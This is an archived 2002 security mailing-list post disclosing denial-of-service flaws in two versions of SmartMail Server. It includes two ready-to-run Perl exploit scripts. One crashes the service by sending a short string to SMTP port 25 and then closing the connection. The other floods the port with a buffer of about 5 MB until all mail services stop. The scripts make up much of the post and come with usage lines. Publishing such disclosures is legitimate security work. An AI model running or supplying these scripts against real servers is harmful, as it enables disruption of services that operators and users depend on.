SmartMail server DOS

From: securma massine (securmaat_private)
Date: Thu Oct 31 2002 - 09:26:03 PST

Next message: Sebastian Krahmer: "SuSE Security Announcement: lprng/html2ps (SuSE-SA:2002:040)"

Previous message: Martin Schulze: "[SECURITY] [DSA 185-1] New heimdal packages fix buffer overflows"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

hi

SmartMail Server ( http://www.virtualzone.de/smartmail/)is 
a full featured E-Mail Server. It can be
run on any 32Bit compatible Microsoft Windows machine and
complies with the standards of SMTP, POP3 and HTTP 
(Webinterface).
SmartMail proposes two version of SmartMail server, I found 
that two versions were vulnerable has an attack DOS
 1- SmartMail Server 2.0 Interim Build 83: the closing of 
connection during sends dated causes one is 
necessary "Access violatio at address 0046CBCC i 
module 'smartsvr.exe' write of address 76756f4e " that is 
exactly the same vulnerability which I have decouvert 
concerning popwerft and the exploit has the same effect on 
the two softwares
 expoit :


#!/usr/bin/perl -w
# greetz: marocit and #crack.fr (christal)
# securmaat_private
use Socket;
if (not $ARGV[0]) {
	print qq~
 		Usage: sm.pl <host>
	~; 
exit;}

$ip=$ARGV[0];
print "SmartMail server 2.0 DoS\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sendexplt("MASSINE");
sub sendexplt {
 my ($pstr)=@_; 
	$target= inet_aton($ip) || die("inet_aton 
problems");
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
 die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,25,$target)){
 select(S); 
		$|=1;
 print $pstr; 
 sleep 3;
	 close(S); 
 } else { die("Can't connect...\n"); }
}



2-SmartMail Server 1.0 BETA 10 :sends it 5MG of dated with 
port 25 or 110 causes the shutdown of all the services 
(pop/smtp/webinterface) 
exploit:
#!/usr/bin/perl -w
# tool smartdos.pl
# securmaat_private
# Greetz: marocit and #crack.fr (specialement christal.)
# 
use IO::Socket;
if ($#ARGV<0)
{
 print "\n write the target IP!\n\n";
 exit;
}
$buffer = "A"x 5099999 ;
$connect = IO::Socket::INET ->new (Proto=>"tcp", 
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer";
print "\nsending exploit......\n\n"; 



securmaat_private


_________________________________________________________ 
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors coût du SMS)

Next message: Sebastian Krahmer: "SuSE Security Announcement: lprng/html2ps (SuSE-SA:2002:040)"
Previous message: Martin Schulze: "[SECURITY] [DSA 185-1] New heimdal packages fix buffer overflows"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Oct 31 2002 - 09:26:05 PST